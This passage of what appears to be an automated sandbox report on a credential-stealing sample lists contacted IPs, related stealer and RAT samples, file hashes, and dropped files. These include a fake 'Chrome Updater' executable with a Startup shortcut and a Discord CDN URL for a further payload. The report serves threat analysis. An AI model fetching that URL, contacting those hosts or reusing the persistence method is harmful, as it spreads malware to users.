                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            SecuriteInfo.com.Trojan.DownLoader45.55850.29072.15011.exeGet hashmaliciousAsyncRATBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            SecuriteInfo.com.Trojan.DownLoader45.55850.30665.679.exeGet hashmaliciousAsyncRATBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            injector_resou_nls..scr.exeGet hashmaliciousAsyncRAT, Clipboard Hijacker, zgRATBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            81604933152XXXX.batGet hashmaliciousAgentTesla, zgRATBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            SecuriteInfo.com.Trojan.PackedNET.2604.2342.12917.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            SecuriteInfo.com.Trojan.PackedNET.2604.4628.31260.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            file.exeGet hashmaliciousRisePro Stealer, VidarBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            qhNIPt85oM.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            1zbhEkFTTc.exeGet hashmaliciousRisePro Stealer, VidarBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99
                                            GRsK3xx3q3.exeGet hashmaliciousRisePro StealerBrowse
                                            • 104.21.89.193
                                            • 15.204.213.5
                                            • 162.159.129.233
                                            • 149.154.167.99

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\Desktop\System.Data.SQLite.EF6.dll3oYqGm39Lk.exeGet hashmaliciousAmadey, PrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                  RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                    iDSecure-4.7.31.0.exeGet hashmaliciousUnknownBrowse
                                                      file.exeGet hashmaliciousCinoshi StealerBrowse
                                                        file.exeGet hashmaliciousCinoshi StealerBrowse
                                                          file.exeGet hashmaliciousCinoshi StealerBrowse
                                                            file.exeGet hashmaliciousXmrigBrowse
                                                              file.exeGet hashmaliciousCinoshi StealerBrowse
                                                                file.exeGet hashmaliciousCinoshi StealerBrowse
                                                                  JBWI8Xqw4E.exeGet hashmaliciousUnknownBrowse
                                                                    putin1337-202384344125.exeGet hashmaliciousUnknownBrowse
                                                                      zRDfKrcrtA.exeGet hashmaliciousCinoshi Stealer, XmrigBrowse
                                                                        GbFrL1q304.exeGet hashmaliciousCinoshi Stealer, XmrigBrowse
                                                                          yP9ICYGYoU.exeGet hashmaliciousXmrigBrowse
                                                                            GbFrL1q304.exeGet hashmaliciousCinoshi Stealer, XmrigBrowse
                                                                              m4T6KEYsbh.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                fvDLctAJYw.exeGet hashmaliciousUnknownBrowse
                                                                                  XWorm-RAT-V2.1-builder.exeGet hashmaliciousClipboard Hijacker, Discord Token Stealer, Qvoid Stealer, RedLine, ToxicEyeBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\1831c9dd-6e75-4e6a-9d08-cadbbda6ded2

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                    Category:dropped
                                                                                    Size (bytes):20480
                                                                                    Entropy (8bit):0.6732424250451717
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\33f08b03-7764-4256-8356-5047eb69b996

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):98304
                                                                                    Entropy (8bit):0.08235737944063153
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\33f08b03-7764-4256-8356-5047eb69b996-shm

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):32768
                                                                                    Entropy (8bit):0.017262956703125623
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\3dd37a12-b018-4e7b-b270-13b167a9df5a

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                    Category:dropped
                                                                                    Size (bytes):20480
                                                                                    Entropy (8bit):0.8508558324143882
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                    MD5:933D6D14518371B212F36C3835794D75
                                                                                    SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                    SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                    SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\654fea00-a066-4435-869a-6cdbea15b675

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):51200
                                                                                    Entropy (8bit):0.8745947603342119
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                    MD5:378391FDB591852E472D99DC4BF837DA
                                                                                    SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                    SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                    SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\d3e95f9e-1e31-40b6-b76d-0afc31d82655

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):40960
                                                                                    Entropy (8bit):0.8553638852307782
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\UpdateLinks

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):109
                                                                                    Entropy (8bit):4.897509243306508
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:N8cCWdy6//NTABTW+QKRpXzo+LACZ1edWzR2n:2cry6XNklW+lDs08MQ
                                                                                    MD5:A3FC9B5D30D2F37E41B4BB6DF8CDC56E
                                                                                    SHA1:F7A8A433862770117634360D2EE57FDA19E06CCE
                                                                                    SHA-256:AE380A1377D05F13B264D657A5740A31E4B08A32634B2D4867E8C344062EBAED
                                                                                    SHA-512:29D2E49C40BEE9613EE8E59775EC800B575ED5ECA5811FD1659FE0D577C7F810A634106833B4C45F0E682B872EB78019237C0EE5EC10EDB67B45C19EF223A4B8
                                                                                    Malicious:false
                                                                                    Preview:https://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883.NOTASKS

                                                                                    C:\Users\user\AppData\Local\j0hny.zip

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):99032
                                                                                    Entropy (8bit):7.996006441227087
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:oXwp42jgLHLP8bC2+GvYVXz42SLuLspnm:sQ2rP8bC2+GQVj42+pm
                                                                                    MD5:4A5CB84611DDF73F0DCE9757B55B18B2
                                                                                    SHA1:09918AE681B5C42977982BF34ECAD673E4F9041E
                                                                                    SHA-256:F4DA9A3B517AC957E9EF7FD8E9D8E04EBC5594437B894A70D64F24E0499F53FE
                                                                                    SHA-512:0DD53BC8449D5D4698DC4C47608E1B07E20BF60756DDE34BDB3A8F0D5FEDA21D0F653B046BC19B24FE100E01AACF44D68C402007B4C512556B1993EF342BCD55
                                                                                    Malicious:false
                                                                                    Preview:PK........$.$X..N9...........The Cinoshi Project.txtmR...0....{.5...9.I...4i.....,.$,$.Hu..+R.....I...,$..k....p.].w..@8w.(.q.h.3.@.h6..Xf:FP.0.6...l.L....aDk.W.R...M.l...u.=vB........=N.=...D...K.R@2A..]....5?S..\.`w..J..k....gK.{..8.....z4F.v.Y....`.K.>.0l>.zK....^.m.....3.?..t..9.......x.h.....'H..$._;.kh#.8...(...{.....T..K..p.s..`..!....x&U..v..E.5<Me.....F.DlA.8w...*+x......J....,.a..Q!.0kx.s.{......l....<y`.....*.7.*..3".Y.]...:.%..p..+.........-(..k.\....iqL..(.IUY.zF...k..*.Fd.maA.....\.uQ..YZ......T....qK....i.6......./z...._cn........O.ZtJo~...kU."q~2..x.7..t..qV|.K..^un?o.....B...PK..........%XBv..Q...........Information.txtmRKo.1...WLop!f..dO.HE9.E..Ro.k...m..S..r.!.H...%..}.n.`..x......L...(.Gh.N..7g....ly..92...|,.y9S. .y.P..U:(.)PF.jxV.a....:......M..e.{.-..0E.*.. .@.....v...............0P..Z[q/YS...X2.sq.%i.m!.+c..%+.2r(..I..#../o='I.,.A.m......._..t..M..G.D5.q...2,..O).....y....Db..&.Tu..i..2c..K.:.....Z.Hi...n...i.^8p^X/......."....I.'

                                                                                    C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):419840
                                                                                    Entropy (8bit):5.27473695537137
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:rHaDwqMZ+R4hPhhscC9AcUYxDSA6hieEn1dvXB9XR77ir6Nmu91eLfKPSSP3v/qr:r6Yb
                                                                                    MD5:C4D558ACC94162490F5048E29FDBA96F
                                                                                    SHA1:62C3E55C500A5EC72568591EA7873288951C7B25
                                                                                    SHA-256:3D7066DDA89F31D017E8D9CB6131F14F3AAB9EC7CDB8D997A7D8198ADF197180
                                                                                    SHA-512:5D52359E0F90A4DDC997FF95BEEAD7024D761CF5D0BDE2195CA237EEA0A836DE949BA8DFB390FFAF8E97B0BEE5A7D2D3DF7B268BB6BFD4B337D436FF5C3C3CB5
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                                    • Antivirus: Virustotal, Detection: 60%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t&..........."...0..\...........|... ........@.. ....................................`.................................D|..J....................................|..8............................................ ............... ..H............text....\... ...^.................. ..`.rsrc................`..............@..@.reloc...............f..............@..@................t|......H...........h.......r...................................................Q..P~AeS....:'^.;.k...E..X.K... 0.U.vm...v...L%O....*..&5D..b...ZI%..gE...]..../u..L...F..k....._......mz.RY...-Xt!.I.i)...Du.j.yx.X>k'.q..O...... .f}.:.c.J...1..Q3`bS.E.dw.k........+.pHhX.E....l.R{...s.#rK.....WfU.*..(./.....{..7..0(..#.....j....\...+.y......Ni.e........4b....4.S...U....2...u...9@`.^q...n.Q>!.....=.>..M.F.T..q.]....o`P.....$..@C.g.w..B.......[8y...|.G|B..............2+.H

                                                                                    C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:false
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Users\user\AppData\Roaming\Chrome Updater\ChromeLog

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:I:I
                                                                                    MD5:336D5EBC5436534E61D16E63DDFCA327
                                                                                    SHA1:3BC15C8AAE3E4124DD409035F32EA2FD6835EFC9
                                                                                    SHA-256:3973E022E93220F9212C18D0D0C543AE7C309E46640DA93A4A0314DE999F5112
                                                                                    SHA-512:7C0B0D99A6E4C33CDA0F6F63547F878F4DD9F486DFE5D0446CE004B1C0FF28F191FF86F5D5933D3614CCEEE6FBBDC17E658881D3A164DFA5D6F4C699B2126E3D
                                                                                    Malicious:false
                                                                                    Preview:-

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnk

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):954
                                                                                    Entropy (8bit):3.0588141428421234
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:8gl0esX2lw/tz0/CSLAsKqn1E3LegEbNfBJ4t2YZ/elFlSJm:8VTWLqqnCbeDFqy
                                                                                    MD5:933BBE169902B2ABEA4343B93B8405A8
                                                                                    SHA1:192E181CFE7AAB58BCB45750BC1DA3E3CCEF98B1
                                                                                    SHA-256:9B325C351524A8D7731914DE5AEB457643948373D0E35F6EF9B12AF883C39368
                                                                                    SHA-512:C26E41E3B1F8738C786F73E9D55698D8E061AAD624BF951718986CC5849198B7D27C9195EDA89B4874FA0E57514F0BF6B02A22CB7CDFB7C4019164DFA829BBD0
                                                                                    Malicious:false
                                                                                    Preview:L..................F........................................................Q....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....l.1...........Chrome Updater..N............................................C.h.r.o.m.e. .U.p.d.a.t.e.r.....`.2...........Chrome.exe..F............................................C.h.r.o.m.e...e.x.e.......(.....\.....\.....\.....\.....\.C.h.r.o.m.e. .U.p.d.a.t.e.r.\.C.h.r.o.m.e...e.x.e...........................>.e.L.:..er.=................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                                                    C:\Users\user\AppData\Roaming\WinUpdateLog

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):12
                                                                                    Entropy (8bit):3.0220552088742005
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:jHLLb:jT
                                                                                    MD5:846CD411A9707D3080435BB0FEA2E721
                                                                                    SHA1:092ACB03B138E521A45442428CD2A5DE4360EB3D
                                                                                    SHA-256:68ED2E06BA827F70714679F8E5B16ECA97BF02B13EDE5450E93CE10340831512
                                                                                    SHA-512:5A4E007D589554FEDFF8C90203C24C450C05FED3DB0F79C2770C57DA6C546B7BBC14B32EED09DDF9E57F1E2D36DE892E803B428B2468CB760CD8CF7B16DA896E
                                                                                    Malicious:false
                                                                                    Preview:Starting....

                                                                                    C:\Users\user\Desktop\System.Data.SQLite.EF6.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):201528
                                                                                    Entropy (8bit):6.037117497326589
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9Nh7rnOCmxzBE91M+I1X+IZ/6KP8czmLhL:9b7Zmx1E91AuQ6KP8c
                                                                                    MD5:6F69454F7206EB6FB00B1F15D13718D9
                                                                                    SHA1:C1472AD5C91DA5E729BF419B8546657B2152915C
                                                                                    SHA-256:857A287F7F39097C2F70FF0CE681D35196DAEE60B43F255BC72B842A351208C4
                                                                                    SHA-512:27C193CB2D25938BC508312C38932A25D63A8ECF49C9AF6AD2819D1291F44F2B4435725DFEF2DDED2E0F3415AA73C8AF276084899302F8B196A993DDE85AE095
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Joe Sandbox View:
                                                                                    • Filename: 3oYqGm39Lk.exe, Detection: malicious, Browse
                                                                                    • Filename: jtfCFDmLdX.exe, Detection: malicious, Browse
                                                                                    • Filename: vSlVoTPrmP.exe, Detection: malicious, Browse
                                                                                    • Filename: RO67OsrIWi.exe, Detection: malicious, Browse
                                                                                    • Filename: iDSecure-4.7.31.0.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: JBWI8Xqw4E.exe, Detection: malicious, Browse
                                                                                    • Filename: putin1337-202384344125.exe, Detection: malicious, Browse
                                                                                    • Filename: zRDfKrcrtA.exe, Detection: malicious, Browse
                                                                                    • Filename: GbFrL1q304.exe, Detection: malicious, Browse
                                                                                    • Filename: yP9ICYGYoU.exe, Detection: malicious, Browse
                                                                                    • Filename: GbFrL1q304.exe, Detection: malicious, Browse
                                                                                    • Filename: m4T6KEYsbh.exe, Detection: malicious, Browse
                                                                                    • Filename: fvDLctAJYw.exe, Detection: malicious, Browse
                                                                                    • Filename: XWorm-RAT-V2.1-builder.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.a.........." ..0.............r.... ........... .......................@.......)....`................................. ...O.......................8A... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................T.......H........................W..p...h........................................0..,.......~....s .......o!......r...pso.....r...po"...&.o#...o$....o%....o&...&...r/..po"...&.o'...o(....+A.o)...t.....,...+..r9..po"...&%o*....o%....r?..po"...&o+....o%....o....-....,..o......,*.........os........o,...o"...&.rG..po"...&.o&...&.rQ..po"...&.o-....o%....r_..po....&....o!....(......op...Q.o/...*......_.M........0..n.......~....s ...%..rc..pso....%r...po"...&.o#...o$....o%...%o&...&%rQ..po"

                                                                                    C:\Users\user\Desktop\System.Data.SQLite.Linq.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):201520
                                                                                    Entropy (8bit):6.040084008872652
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:0Nh7rny2puIm199zIsd9IZ16KP8cfYLcgML3:0b7G2wbdLm6KP8cwO
                                                                                    MD5:BBB0D3DDAABA530DC111E665A4891217
                                                                                    SHA1:CEA5A71FF0305083A9ADD3C4755A8E54AB10F869
                                                                                    SHA-256:4FA3CC89F5C3CFA0F794C1F849B0EA8D081E5C0E69D7FB2D834CAED08D1140C0
                                                                                    SHA-512:EBF248BB57355DE887770D91EA2B40A98E0760335A57DC6EA92AB89E65177CAE95EB1C08116855C8EEECA81D4022CCDDE2FCA7CF34FAD68B4FF0E14B74C93B89
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.a.........." ..0.................. ........... .......................@...........`.....................................O.......................0A... ......L................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........|...........\W..p............................................0..,.......~....s .......o!......r...pso.....r...po"...&.o#...o$....o%....o&...&...r/..po"...&.o'...o(....+A.o)...t.....,...+..r9..po"...&%o*....o%....r?..po"...&o+....o%....o....-....,..o......,*.........os........o,...o"...&.rG..po"...&.o&...&.rQ..po"...&.o-....o%....r_..po....&....o!....(......op...Q.o/...*......_.M........0..n.......~....s ...%..rc..pso....%r...po"...&.o#...o$....o%...%o&...&%rQ..po"

                                                                                    C:\Users\user\Desktop\System.Data.SQLite.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):393520
                                                                                    Entropy (8bit):6.124594999135733
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:5vXCrbE724yjK3r/fFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchs:h8dDm3r/7
                                                                                    MD5:55C797383DBBBFE93C0FE3215B99B8EC
                                                                                    SHA1:1B089157F3D8AE64C62EA15CDAD3D82EAFA1DF4B
                                                                                    SHA-256:5FAC5A9E9B8BBDAD6CF661DBF3187E395914CD7139E34B725906EFBB60122C0D
                                                                                    SHA-512:648A7DA0BCDA6CCD31B4D6CDC1C90C3BC3C11023FCCEB569F1972B8F6AB8F92452D1A80205038EDCF409669265B6756BA0DA6B1A734BD1AE4B6C527BBEBB8757
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.a.........." ..0.................. ........... ....................... ...........`.................................T...O.......p...............0A........................................................... ............... ..H............text....... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........+..<...........LB..P...........................................:.(;.....}....*..{....*:.(;.....}....*..{....*...0...........~<...}.....r...p}........(.....(......~<...(=...,z.....s,...}.......}.......}............{............%......(>....%...=....%...!....%...%.........%....%.........s....(....*vr)..p.(\...,...}....*..}....*..{....*z.{....,......(>...o?...s@...z*..0..'........{....-..(......o........(N.....}.....*..................0..T........{....,K.{....oA....+...

                                                                                    C:\Users\user\Desktop\x64\SQLite.Interop.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1763632
                                                                                    Entropy (8bit):6.553412105578455
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:YPUxmkgSxPgobZPRjZ22H6edtOZzWySRO3mlE0i/Yl5P+qF+8k+ao/si6:8UxXPgo8e6WYBSJZSS5P97I
                                                                                    MD5:56A504A34D2CFBFC7EAA2B68E34AF8AD
                                                                                    SHA1:426B48B0F3B691E3BB29F465AED9B936F29FC8CC
